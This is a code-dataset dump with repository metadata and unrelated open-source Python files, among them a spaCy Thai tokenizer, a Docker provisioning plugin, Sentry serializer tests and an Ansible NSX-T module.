max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
spacy/lang/th/__init__.py
snosrap/spaCy
1
16700
from .stop_words import STOP_WORDS from .lex_attrs import LEX_ATTRS from ...language import Language, BaseDefaults from ...tokens import Doc from ...util import DummyTokenizer, registry, load_config_from_str from ...vocab import Vocab DEFAULT_CONFIG = """ [nlp] [nlp.tokenizer] @tokenizers = "spacy.th.ThaiTokenizer" """ @registry.tokenizers("spacy.th.ThaiTokenizer") def create_thai_tokenizer(): def thai_tokenizer_factory(nlp): return ThaiTokenizer(nlp.vocab) return thai_tokenizer_factory class ThaiTokenizer(DummyTokenizer): def __init__(self, vocab: Vocab) -> None: try: from pythainlp.tokenize import word_tokenize except ImportError: raise ImportError( "The Thai tokenizer requires the PyThaiNLP library: " "https://github.com/PyThaiNLP/pythainlp" ) from None self.word_tokenize = word_tokenize self.vocab = vocab def __call__(self, text: str) -> Doc: words = list(self.word_tokenize(text)) spaces = [False] * len(words) return Doc(self.vocab, words=words, spaces=spaces) class ThaiDefaults(BaseDefaults): config = load_config_from_str(DEFAULT_CONFIG) lex_attr_getters = LEX_ATTRS stop_words = STOP_WORDS class Thai(Language): lang = "th" Defaults = ThaiDefaults __all__ = ["Thai"]
2.46875
2
src/setup/__init__.py
ScottDay/DFN-Maintenance-GUI-Backend
2
16701
from .args import args from .extensions import extensions from .logger import logger from .routes import routes __all__ = ['args', 'extensions', 'logger', 'routes']
1.289063
1
cloudrunner_server/plugins/clouds/docker_host.py
ttrifonov/cloudrunner-server
2
16702
#!/usr/bin/python # -*- coding: utf-8 -*- # vim: tabstop=4 shiftwidth=4 softtabstop=4 # /******************************************************* # * Copyright (C) 2013-2014 CloudRunner.io <<EMAIL>> # * # * Proprietary and confidential # * This file is part of CloudRunner Server. # * # * CloudRunner Server can not be copied and/or distributed # * without the express permission of CloudRunner.io # *******************************************************/ import json import os import requests import tempfile from cloudrunner import VAR_DIR from .base import BaseCloudProvider, CR_SERVER HEADERS = {'Content-Type': 'application/json'} class Docker(BaseCloudProvider): def __init__(self, profile, log=None): super(Docker, self).__init__(profile, log) prefix = "%s-%s" % (self.profile.owner.org.name, self.profile.id) self._path = os.path.join(VAR_DIR, "tmp", "creds", prefix) if ":" in self.profile.username: self.server_address = self.profile.username else: self.server_address = "%s:2376" % self.profile.username try: os.makedirs(self._path) except: pass _, self._cert_path = tempfile.mkstemp(dir=self._path, suffix='pem', text=True) _, self._key_path = tempfile.mkstemp(dir=self._path, suffix='pem', text=True) with open(self._cert_path, 'w') as f: f.write(self.profile.password) with open(self._key_path, 'w') as f: f.write(self.profile.arguments) def _cleanup(self): os.unlink(self._cert_path) os.unlink(self._key_path) def create_machine(self, name, image=None, server=CR_SERVER, ports=None, privileged=None, volumes=None, **kwargs): self.log.info("Registering Docker machine [%s::%s] for [%s] at [%s]" % (name, image, CR_SERVER, self.server_address)) priv = privileged in ['1', 'true', 'True', True] # cmd = PROVISION % dict(server=server, # name=name, # api_key=self.api_key) exposed_ports, port_bindings = {}, {} _ports = [p.strip() for p in ports.split(",") if p.strip()] for port in _ports: cont_port, _, host_port = port.partition(":") exposed = "%s/tcp" % cont_port 
exposed_ports[exposed] = {} if host_port: host_port = host_port port_bindings[exposed] = [{ 'HostPort': host_port }] else: port_bindings[exposed] = [{ 'HostPort': None }] volumes_desc, binds = {}, [] _volumes = [v.strip() for v in volumes.split(",") if v.strip()] for _vol in _volumes: mnt_host, _, mnt_cont = _vol.partition(":") if not mnt_cont: mnt_cont = mnt_host mnt_host = '' volumes_desc[mnt_cont] = {} if mnt_host: binds.append("%s:%s" % (mnt_host, mnt_cont)) else: binds.append("%s:%s" % (mnt_cont, mnt_cont)) env = ["SERVER_ID=%s" % CR_SERVER, "ORG_ID=%s" % self.api_key] create_data = dict(Hostname=name, Image=image, Env=env, ExposedPorts=exposed_ports, Volumes=volumes_desc, Privileged=priv, Tty=True, OpenStdin=True,) # Cmd=[cmd], # Entrypoint=['/bin/curl']) create_url = "https://%s/containers/create" % self.server_address try: server_ids = [] res = requests.post(create_url, data=json.dumps(create_data), cert=(self._cert_path, self._key_path), headers=HEADERS, verify=False) if res.status_code >= 300: self.log.error("FAILURE %s(%s)" % (res.status_code, res.content)) return self.FAIL, [], {} start_data = dict(PortBindings=port_bindings, Binds=binds, Privileged=priv, Detach=False, Tty=False) server_id = res.json()['Id'] self.log.info("Started docker instance %s" % server_id) server_ids.append(server_id) start_url = "https://%s/containers/%s/start" % ( self.server_address, server_id) res = requests.post(start_url, data=json.dumps(start_data), cert=(self._cert_path, self._key_path), headers=HEADERS, verify=False) meta = dict(server_address=self.server_address) except Exception, ex: self.log.exception(ex) raise finally: self._cleanup() return self.OK, server_ids, meta def delete_machine(self, server_ids, **kwargs): ret = self.OK for server_id in server_ids: try: delete_url = "https://%s/containers/%s?force=true" % ( self.server_address, server_id) res = requests.delete(delete_url, cert=(self._cert_path, self._key_path), headers=HEADERS, verify=False) if 
res.status_code >= 300: self.log.error("FAILURE %s(%s)" % (res.status_code, res.content)) ret = self.FAIL except Exception, ex: self.log.error(ex) return ret
1.859375
2
scope/client_util/job_runner_check.py
drew-sinha/rpc-scope
1
16703
# -*- coding: utf-8 -*- # This code is licensed under the MIT License (see LICENSE file for details) import platform import datetime import sys import pathlib import subprocess import time from .. import scope_job_runner from ..config import scope_configuration def main(): if len(sys.argv) == 2 and sys.argv[1] == '--install': install_systemd_units() else: check_job_runner() TIMER_UNIT = '''[Unit] Description=Check that scope_job_runner is active if jobs are queued [Timer] OnBootSec=15min OnUnitActiveSec=45min [Install] WantedBy=timers.target ''' SERVICE_UNIT = '''[Unit] Description=Check that scope_job_runner is active if jobs are queued [Service] ExecStart={executable} ''' def install_systemd_units(): base_unit = pathlib.Path('/etc/systemd/system/job_runner_check') timer_file = base_unit.with_suffix('.timer') timer_file.write_text(TIMER_UNIT) timer_file.chmod(0o644) service_file = base_unit.with_suffix('.service') service_file.write_text(SERVICE_UNIT.format(executable=sys.argv[0])) service_file.chmod(0o644) subprocess.run(['systemctl', 'enable', timer_file.name], check=True) subprocess.run(['systemctl', 'start', timer_file.name], check=True) print(f'systemd units installed. Run systemctl status {timer_file.name} or {base_unit.name} to check.') ERROR_SUBJECT = '{host}: scope job pending but scope_job_runner is inactive.' ERROR_MESSAGE = '''One or more of your jobs is overdue on {host}, but the scope job runner daemon is not running. These jobs will not be run until the command `scope_job_runner start` is executed on that machine. Time: {time} Queued Jobs: {jobs} ''' ALL_CLEAR_SUBJECT = '{host}: scope_job_runner was reactivated.' ALL_CLEAR_MESSAGE = '''One or more of your jobs on {host} was stalled due to an inactive job runner. The job runner has now been restarted and your jobs will be run as planned. 
Time: {time} Queued Jobs: {jobs} ''' def check_job_runner(): runner = scope_job_runner.JobRunner() problem_file = scope_configuration.CONFIG_DIR / '.jobs_queued_but_runner_inactive' overdue_jobs, to_email = get_overdue_jobs(runner) if len(overdue_jobs) == 0: return if runner.is_running(): if problem_file.exists(): # job runner was restarted; problem is cleared. # Alert previous email recipients that things are good now print('Previous error, but now job runner is running.') send_email(to_email, runner, overdue_jobs, ALL_CLEAR_SUBJECT, ALL_CLEAR_MESSAGE, 'all-clear') # Remove the problem-file flag problem_file.unlink() else: # job runner is not running. print('Jobs queued but job runner is not running.') previously_emailed = set() if problem_file.exists(): # this error was previously detected previously_emailed.update(problem_file.read_text().split('\n')) to_email -= previously_emailed if to_email: # we have not alerted some people about the queued jobs send_email(to_email, runner, overdue_jobs, ERROR_SUBJECT, ERROR_MESSAGE, 'alert') problem_file.write_text('\n'.join(to_email | previously_emailed)) else: print('No alert emailed: all relevant parties have already been emailed.') def get_overdue_jobs(runner): # Get overdue jobs that anyone cares about (e.g. that aren't system checks and have # emails attached). 
now = time.time() exec_dir = pathlib.Path(sys.argv[0]).parent overdue_jobs = [] to_email = set() for job in runner.jobs.get_jobs(): if ( job.exec_file.parent != exec_dir and # job is user-provided, not like incubator_check job.status == scope_job_runner.STATUS_QUEUED and # and is active job.next_run_time is not None and # and is scheduled to run again job.next_run_time < now and # and is overdue job.alert_emails ): # and has a non-empty, non-None list of people to alert overdue_jobs.append(job) to_email.update(job.alert_emails) return overdue_jobs, to_email def send_email(to_email, runner, jobs, subject_template, body_template, email_type): host = platform.node().split('.')[0] now = datetime.datetime.now().isoformat(sep=' ', timespec='seconds') subject = subject_template.format(host=host) job_blurbs = '\n'.join(runner.format_job_blurb(job) for job in jobs) message = body_template.format(host=host, time=now, jobs=job_blurbs) print('Emailing {} about the following jobs:\n{}'.format(email_type, job_blurbs)) runner.send_error_email(sorted(to_email), subject, message)
2.28125
2
toffy/json_utils.py
angelolab/toffy
0
16704
<filename>toffy/json_utils.py<gh_stars>0 import copy import json import os from ark.utils import io_utils def rename_missing_fovs(fov_data): """Identify FOVs that are missing the 'name' key and create one with value placeholder_{n} Args: fov_data (dict): the FOV run JSON data Returns: dict: a copy of the run JSON data with placeholder names for FOVs that lack one """ copy_fov_data = copy.deepcopy(fov_data) # count of FOVs that are missing the 'name' key missing_count = 0 # iterate over each FOV and add a placeholder name if necessary for fov in copy_fov_data['fovs']: if 'name' not in fov.keys(): missing_count += 1 fov['name'] = f'placeholder_{missing_count}' return copy_fov_data def rename_duplicate_fovs(tma_fovs): """Identify and rename duplicate FOV names in `fov_list` For a given FOV name, the subsequent duplicates get renamed `{FOV}_duplicate{n}` Args: tma_fovs (dict): The TMA run JSON, should contain a `'fovs'` key defining the list of FOVs Returns: dict: The same run JSON with the FOVs renamed to account for duplicates """ # used for identifying the number of times each FOV was found fov_count = {} # iterate over each FOV for fov in tma_fovs['fovs']: if fov['name'] not in fov_count: fov_count[fov['name']] = 0 fov_count[fov['name']] += 1 if fov_count[fov['name']] > 1: fov['name'] = '%s_duplicate%d' % (fov['name'], fov_count[fov['name']] - 1) return tma_fovs def list_moly_fovs(bin_file_dir): """Lists all of the FOVs in a directory which are moly FOVs Args: bin_file_dir (str): path to bin files Returns: list: list of FOVs which are moly FOVs""" json_files = io_utils.list_files(bin_file_dir, '.json') moly_fovs = [] for file in json_files: json_path = os.path.join(bin_file_dir, file) with open(json_path, 'r') as jp: json_file = json.load(jp) if json_file.get('standardTarget', "") == "Molybdenum Foil": moly_name = file.split('.json')[0] moly_fovs.append(moly_name) return moly_fovs
3.21875
3
app/plugins/task/upload.py
venturiscm/hcp
1
16705
from systems.plugins.index import BaseProvider import os class Provider(BaseProvider('task', 'upload')): def execute(self, results, params): file_path = self.get_path(self.field_file) if not os.path.exists(file_path): self.command.error("Upload task provider file {} does not exist".format(file_path)) ssh = self._get_ssh() ssh.upload(file_path, self.field_remote_path, mode = self.field_mode, owner = self.field_owner, group = self.field_group )
2.3125
2
win_dein_deoplete/.vim/.cache/.vimrc/.dein/rplugin/python3/denite/source/outline.py
takkii/dotfile
1
16706
# ============================================================================ # FILE: outline.py # AUTHOR: <NAME> (tamura.yasumasa _at_ gmail.com) # License: MIT license # ============================================================================ from .base import Base from subprocess import check_output, CalledProcessError from denite.util import parse_tagline import re import tempfile OUTLINE_HIGHLIGHT_SYNTAX = [ {'name': 'Name', 'link': 'Identifier', 're': '\S\+\%(\s\+\[\)\@='}, {'name': 'Type', 'link': 'Type', 're': '\[.\{-}\]'}, {'name': 'Ref', 'link': 'Comment', 're': '\s\s.\+'} ] class Source(Base): def __init__(self, vim): super().__init__(vim) self.name = 'outline' self.kind = 'file' self.vars = { 'command': ['ctags'], 'options': [], 'file_opt': '-o', 'ignore_types': [], 'encoding': 'utf-8' } def on_init(self, context): context['__path'] = context['args'][0] if len( context['args']) > 0 else self.vim.current.buffer.name def highlight(self): for syn in OUTLINE_HIGHLIGHT_SYNTAX: self.vim.command( 'syntax match {0}_{1} /{2}/ contained containedin={0}'.format( self.syntax_name, syn['name'], syn['re'])) self.vim.command( 'highlight default link {0}_{1} {2}'.format( self.syntax_name, syn['name'], syn['link'])) def gather_candidates(self, context): with tempfile.NamedTemporaryFile( mode='w', encoding=self.vars['encoding']) as tf: args = [] args += self.vars['command'] args += self.vars['options'] args += [self.vars['file_opt'], tf.name] args += [context['__path']] self.print_message(context, args) tf.close() try: check_output(args).decode(self.vars['encoding'], 'replace') except CalledProcessError: return [] candidates = [] with open(tf.name, encoding=self.vars['encoding'], errors='replace') as f: for line in f: if re.match('!', line) or not line: continue info = parse_tagline(line.rstrip(), tf.name) candidate = { 'word': info['name'], 'action__path': info['file'], } fmt = '{name} [{type}] {file} {ref}' candidate['abbr'] = fmt.format(**info) if info['line']: 
candidate['action__line'] = info['line'] else: candidate['action__pattern'] = info['pattern'] candidates.append(candidate) return candidates
2.203125
2
test.py
Tweetsched/tweetsched-publisher
1
16707
<reponame>Tweetsched/tweetsched-publisher<filename>test.py from base64 import b64encode from app import app import unittest from mock import patch import os import json from twython import Twython class TestApp(unittest.TestCase): def setUp(self): self.app = app.test_client() os.environ['SERVICE_KEY'] = 'test-key' os.environ['SERVICE_PASS'] = '<PASSWORD>' os.environ['APP_KEY'] = 'test-key' os.environ['APP_SECRET'] = 'test-secret' os.environ['OAUTH_TOKEN'] = 'test-oauth-token' os.environ['OAUTH_TOKEN_SECRET'] = 'test-oauth-token-secret' @patch('app.Twython.update_status') def test_publish_tweet(self, update_status_mock): update_status_mock.return_value = True auth = (os.environ['SERVICE_KEY'] + ':' + os.environ['SERVICE_PASS']).encode('utf-8') headers = { 'Authorization': 'Basic ' + b64encode(auth).decode() } rv = self.app.post('/api/v1/tweets', data = json.dumps(dict(id = 3, message = 'test tweet', profileId = '1')), content_type = 'application/json', headers = headers) self.assertEqual(rv.status_code, 200) self.assertEqual(update_status_mock.call_count, 1) update_status_mock.assert_called_once() def test_404(self): auth = (os.environ['SERVICE_KEY'] + ':' + os.environ['SERVICE_PASS']).encode('utf-8') headers = { 'Authorization': 'Basic ' + b64encode(auth).decode() } rv = self.app.get('/i-am-not-found', headers=headers) self.assertEqual(rv.status_code, 404) if __name__ == '__main__': unittest.main()
2.5
2
Python/01. Fundamentals/01. Simple Calculators/08. Temperature Converter/tempCoverter.py
darioGerussi/exercises
1
16708
# Converts a given temperature from Celsius to Fahrenheit # Prompt user for Celsius temperature degreesCelsius = float(input('\nEnter the temperature in Celsius: ')) # Calculate and display the converted # temperature in Fahrenheit degreesFahrenheit = ((9.0 / 5.0) * degreesCelsius) + 32 print('Fahrenheit equivalent: ', format(degreesFahrenheit, ',.1f'), '\n', sep='')
4.4375
4
website/models/post.py
LKKTGB/lkkpomia
0
16709
from bs4 import BeautifulSoup from django.db import models from django.utils.translation import ugettext_lazy as _ from taggit.managers import TaggableManager class Post(models.Model): title = models.CharField(_('post_title'), max_length=100) body = models.TextField(_('post_body')) tags = TaggableManager(_('post_tags'), help_text=_('post_tags_help_text')) create_time = models.DateTimeField(_('post_create_time'), auto_now_add=True) update_time = models.DateTimeField(_('post_update_time'), auto_now=True) class Meta: verbose_name = _('post') verbose_name_plural = _('posts') @staticmethod def autocomplete_search_fields(): return ('id__iexact', 'title__icontains',) def __str__(self): return self.title @property def cover_url(self): soup = BeautifulSoup(self.body, 'html.parser') tags = soup.findAll('img') return tags[0]['src'] if tags else None @property def summary(self): soup = BeautifulSoup(self.body, 'html.parser') for br in soup.find_all("br"): br.replace_with("\n") ps = [t for t in soup.findAll('p') if t.text.strip()] return ps[0].text if ps else None
2.328125
2
tests/sentry/api/serializers/test_alert_rule.py
kinghuang/sentry
1
16710
<reponame>kinghuang/sentry # -*- coding: utf-8 -*- from __future__ import absolute_import import six from sentry.api.serializers import serialize from sentry.api.serializers.models.alert_rule import DetailedAlertRuleSerializer from sentry.incidents.logic import create_alert_rule, create_alert_rule_trigger from sentry.incidents.models import AlertRuleThresholdType from sentry.snuba.models import QueryAggregations from sentry.testutils import TestCase class BaseAlertRuleSerializerTest(object): def assert_alert_rule_serialized(self, alert_rule, result): assert result["id"] == six.text_type(alert_rule.id) assert result["organizationId"] == six.text_type(alert_rule.organization_id) assert result["name"] == alert_rule.name assert result["thresholdType"] == alert_rule.threshold_type assert result["dataset"] == alert_rule.dataset assert result["query"] == alert_rule.query assert result["aggregation"] == alert_rule.aggregation assert result["timeWindow"] == alert_rule.time_window assert result["resolution"] == alert_rule.resolution assert result["alertThreshold"] == alert_rule.alert_threshold assert result["resolveThreshold"] == alert_rule.resolve_threshold assert result["thresholdPeriod"] == alert_rule.threshold_period assert result["includeAllProjects"] == alert_rule.include_all_projects assert result["dateModified"] == alert_rule.date_modified assert result["dateAdded"] == alert_rule.date_added class AlertRuleSerializerTest(BaseAlertRuleSerializerTest, TestCase): def test_simple(self): alert_rule = create_alert_rule( self.organization, [self.project], "hello", AlertRuleThresholdType.ABOVE, "level:error", QueryAggregations.TOTAL, 10, 1000, 400, 1, ) result = serialize(alert_rule) self.assert_alert_rule_serialized(alert_rule, result) def test_triggers(self): alert_rule = self.create_alert_rule() other_alert_rule = self.create_alert_rule() trigger = create_alert_rule_trigger(alert_rule, "test", AlertRuleThresholdType.ABOVE, 1000) result = serialize([alert_rule, 
other_alert_rule]) assert result[0]["triggers"] == [serialize(trigger)] assert result[1]["triggers"] == [] class DetailedAlertRuleSerializerTest(BaseAlertRuleSerializerTest, TestCase): def test_simple(self): projects = [self.project, self.create_project()] alert_rule = self.create_alert_rule(projects=projects) result = serialize(alert_rule, serializer=DetailedAlertRuleSerializer()) self.assert_alert_rule_serialized(alert_rule, result) assert sorted(result["projects"]) == sorted([p.slug for p in projects]) assert result["excludedProjects"] == [] def test_excluded_projects(self): projects = [self.project] excluded = [self.create_project()] alert_rule = self.create_alert_rule( projects=[], include_all_projects=True, excluded_projects=excluded ) result = serialize(alert_rule, serializer=DetailedAlertRuleSerializer()) self.assert_alert_rule_serialized(alert_rule, result) assert result["projects"] == [p.slug for p in projects] assert result["excludedProjects"] == [p.slug for p in excluded] alert_rule = self.create_alert_rule(projects=projects, include_all_projects=False) result = serialize(alert_rule, serializer=DetailedAlertRuleSerializer()) self.assert_alert_rule_serialized(alert_rule, result) assert result["projects"] == [p.slug for p in projects] assert result["excludedProjects"] == [] def test_triggers(self): alert_rule = self.create_alert_rule() other_alert_rule = self.create_alert_rule() trigger = create_alert_rule_trigger(alert_rule, "test", AlertRuleThresholdType.ABOVE, 1000) result = serialize([alert_rule, other_alert_rule], serializer=DetailedAlertRuleSerializer()) assert result[0]["triggers"] == [serialize(trigger)] assert result[1]["triggers"] == []
1.960938
2
mys/cli/subparsers/test.py
nsauzede/mys
0
16711
import os from ..utils import add_jobs_argument from ..utils import add_no_ccache_argument from ..utils import add_optimize_argument from ..utils import add_verbose_argument from ..utils import build_prepare from ..utils import run def do_test(_parser, args, _mys_config): build_prepare(args.verbose, args.optimize, args.no_ccache) command = [ 'make', '-f', 'build/Makefile', 'test', 'TEST=yes' ] if os.getenv('MAKEFLAGS') is None: command += ['-j', str(args.jobs)] if args.debug: command += ['TRANSPILE_DEBUG=--debug'] run(command, 'Building tests', args.verbose) run(['./build/test'], 'Running tests', args.verbose) def add_subparser(subparsers): subparser = subparsers.add_parser( 'test', description='Build and run tests.') add_verbose_argument(subparser) add_jobs_argument(subparser) add_optimize_argument(subparser, 'debug') add_no_ccache_argument(subparser) subparser.set_defaults(func=do_test)
2.15625
2
plugins/modules/nsxt_transport_node_collections.py
madhukark/ansible-for-nsxt
0
16712
<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2018 VMware, Inc. # SPDX-License-Identifier: BSD-2-Clause OR GPL-3.0-only # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, # BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: nsxt_transport_node_collections short_description: Create transport node collection by attaching Transport Node Profile to cluster. description: When transport node collection is created the hosts which are part of compute collection will be prepared automatically i.e. NSX Manager attempts to install the NSX components on hosts. Transport nodes for these hosts are created using the configuration specified in transport node profile. version_added: "2.7" author: <NAME> options: hostname: description: Deployed NSX manager hostname. required: true type: str username: description: The username to authenticate with the NSX manager. required: true type: str password: description: The password to authenticate with the NSX manager. 
required: true type: str cluster_name: description: CLuster Name required: false type: str compute_manager_name: description: Cluster Manager Name required: false type: str description: description: Description required: true type: str display_name: description: Display name required: true type: str resource_type: description: "Must be set to the value TransportNodeCollection" required: true type: str state: choices: - present - absent description: "State can be either 'present' or 'absent'. 'present' is used to create or update resource. 'absent' is used to delete resource." required: true transport_node_profile_name: description: Transport Node Profile Names required: true type: str ''' EXAMPLES = ''' - name: Create transport node collection nsxt_transport_node_collections: hostname: "{{hostname}}" username: "{{username}}" password: "{{password}}" validate_certs: False display_name: "TNC1" resource_type: "TransportNodeCollection" description: "Transport Node Collections 1" compute_manager_name: "VC1" cluster_name: "cl1" transport_node_profile_name: "TNP1" state: present ''' RETURN = '''# ''' import json, time from ansible.module_utils.basic import AnsibleModule from ansible_collections.vmware.ansible_for_nsxt.plugins.module_utils.vmware_nsxt import vmware_argument_spec, request from ansible.module_utils._text import to_native import ssl import socket import hashlib def get_transport_node_collections_params(args=None): args_to_remove = ['state', 'username', 'password', 'port', 'hostname', 'validate_certs'] for key in args_to_remove: args.pop(key, None) for key, value in args.copy().items(): if value == None: args.pop(key, None) return args def get_transport_node_collections(module, manager_url, mgr_username, mgr_password, validate_certs): try: (rc, resp) = request(manager_url+ '/transport-node-collections', headers=dict(Accept='application/json'), url_username=mgr_username, url_password=mgr_password, validate_certs=validate_certs, ignore_errors=True) except 
Exception as err: module.fail_json(msg='Error accessing transport-node-collections. Error [%s]' % (to_native(err))) return resp def get_id_from_display_name(module, manager_url, mgr_username, mgr_password, validate_certs, endpoint, display_name, exit_if_not_found=True): try: (rc, resp) = request(manager_url+ endpoint, headers=dict(Accept='application/json'), url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg='Error accessing id for display name %s. Error [%s]' % (display_name, to_native(err))) for result in resp['results']: if result.__contains__('display_name') and result['display_name'] == display_name: return result['id'] if exit_if_not_found: module.fail_json(msg='No id exist with display name %s' % display_name) def get_transport_node_collection_from_display_name(module, manager_url, mgr_username, mgr_password, validate_certs, display_name): transport_node_collections = get_transport_node_collections(module, manager_url, mgr_username, mgr_password, validate_certs) for transport_node_collection in transport_node_collections['results']: if transport_node_collection.__contains__('display_name') and transport_node_collection['display_name'] == display_name: return transport_node_collection return None def wait_till_delete(id, module, manager_url, mgr_username, mgr_password, validate_certs): try: while True: (rc, resp) = request(manager_url+ '/transport-node-collections/%s'% id, headers=dict(Accept='application/json'), url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) time.sleep(10) except Exception as err: time.sleep(5) return def get_transport_node_profile_id (module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_profile_name): try: return get_id_from_display_name (module, manager_url, mgr_username, mgr_password, validate_certs, "/transport-node-profiles", transport_node_profile_name) 
except Exception as err: module.fail_json(msg='Error accessing id for display name %s. Error [%s]' % (transport_node_profile_name, to_native(err))) def get_compute_collection_id (module, manager_url, mgr_username, mgr_password, validate_certs, manager_name, cluster_name): try: (rc, resp) = request(manager_url+ '/fabric/compute-collections', headers=dict(Accept='application/json'), url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) compute_manager_id = get_id_from_display_name (module, manager_url, mgr_username, mgr_password, validate_certs, "/fabric/compute-managers", manager_name) except Exception as err: module.fail_json(msg='Error accessing compute collection id for manager %s, cluster %s. Error [%s]' % (manager_name, cluster_name, to_native(err))) for result in resp['results']: if result.__contains__('display_name') and result['display_name'] == cluster_name and \ result['origin_id'] == compute_manager_id: return result['external_id'] module.fail_json(msg='No compute collection id exist with cluster name %s for compute manager %s' % (cluster_name, manager_name)) def update_params_with_id (module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collection_params ): compute_manager_name = transport_node_collection_params.pop('compute_manager_name', None) compute_cluster_name = transport_node_collection_params.pop('cluster_name', None) compute_collection_id = get_compute_collection_id (module, manager_url, mgr_username, mgr_password, validate_certs, compute_manager_name, compute_cluster_name) transport_node_collection_params['compute_collection_id'] = compute_collection_id transport_node_profile_name = transport_node_collection_params.pop('transport_node_profile_name', None) transport_node_profile_id = get_transport_node_profile_id (module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_profile_name) transport_node_collection_params['transport_node_profile_id'] = 
transport_node_profile_id return transport_node_collection_params def check_for_update(module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collection_with_ids): existing_tnc = get_transport_node_collection_from_display_name(module, manager_url, mgr_username, mgr_password, validate_certs, transport_node_collection_with_ids['display_name']) if existing_tnc is None: return False if existing_tnc['compute_collection_id'] == transport_node_collection_with_ids['compute_collection_id'] and \ existing_tnc['transport_node_profile_id'] != transport_node_collection_with_ids['transport_node_profile_id']: return True return False def main(): argument_spec = vmware_argument_spec() argument_spec.update(display_name=dict(required=True, type='str'), description=dict(required=True, type='str'), resource_type=dict(required=True, type='str'), transport_node_profile_name=dict(required=True, type='str'), compute_manager_name=dict(required=False, type='str'), cluster_name=dict(required=False, type='str'), state=dict(required=True, choices=['present', 'absent'])) module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True) transport_node_collections_params = get_transport_node_collections_params(module.params.copy()) state = module.params['state'] mgr_hostname = module.params['hostname'] mgr_username = module.params['username'] mgr_password = module.params['password'] validate_certs = module.params['validate_certs'] display_name = module.params['display_name'] manager_url = 'https://{}/api/v1'.format(mgr_hostname) transport_node_collections_dict = get_transport_node_collection_from_display_name (module, manager_url, mgr_username, mgr_password, validate_certs, display_name) transport_node_collection_id, revision = None, None if transport_node_collections_dict: transport_node_collection_id = transport_node_collections_dict['id'] revision = transport_node_collections_dict['_revision'] if state == 'present': body = update_params_with_id(module, 
manager_url, mgr_username, mgr_password, validate_certs, transport_node_collections_params) updated = check_for_update(module, manager_url, mgr_username, mgr_password, validate_certs, body) headers = dict(Accept="application/json") headers['Content-Type'] = 'application/json' if not updated: # add the transport_node_collections request_data = json.dumps(transport_node_collections_params) if module.check_mode: module.exit_json(changed=True, debug_out=str(request_data), id='12345') try: if transport_node_collection_id: module.exit_json(changed=False, id=transport_node_collection_id, message="transport-node-collection with display_name %s already exist on cluster %s." % (module.params['display_name'], module.params['cluster_name'])) (rc, resp) = request(manager_url+ '/transport-node-collections', data=request_data, headers=headers, method='POST', url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg="Failed to add transport_node_collections. Request body [%s]. Error[%s]." % (request_data, to_native(err))) module.exit_json(changed=True, id=resp["id"], body= str(resp), message="transport-node-collection created for cluster %s." % module.params['cluster_name']) else: if module.check_mode: module.exit_json(changed=True, debug_out=str(json.dumps(transport_node_collections_params)), id=transport_node_collection_id) transport_node_collections_params['_revision'] = revision # update current revision request_data = json.dumps(transport_node_collections_params) id = transport_node_collection_id try: (rc, resp) = request(manager_url+ '/transport-node-collections/%s' % id, data=request_data, headers=headers, method='PUT', url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs, ignore_errors=True) except Exception as err: module.fail_json(msg="Failed to update transport_node_collections with id %s. Request body [%s]. Error[%s]." 
% (id, request_data, to_native(err))) module.exit_json(changed=True, id=resp["id"], body= str(resp), message="transport-node-collection with Compute collection fabric template id %s updated." % id) elif state == 'absent': # delete the array id = transport_node_collection_id if id is None: module.exit_json(changed=False, msg='No transport-node-collection exist with display_name %s' % display_name) if module.check_mode: module.exit_json(changed=True, debug_out=str(json.dumps(transport_node_collections_params)), id=id) try: (rc, resp) = request(manager_url + "/transport-node-collections/%s" % id, method='DELETE', url_username=mgr_username, url_password=<PASSWORD>, validate_certs=validate_certs) except Exception as err: module.fail_json(msg="Failed to delete transport-node-collection with name %s. Error[%s]." % (display_name, to_native(err))) wait_till_delete(id, module, manager_url, mgr_username, mgr_password, validate_certs) module.exit_json(changed=True, id=id, message="transport-node-collection with name %s deleted." % display_name) if __name__ == '__main__': main()
1.265625
1
training/loss.py
drboog/Lafite
45
16713
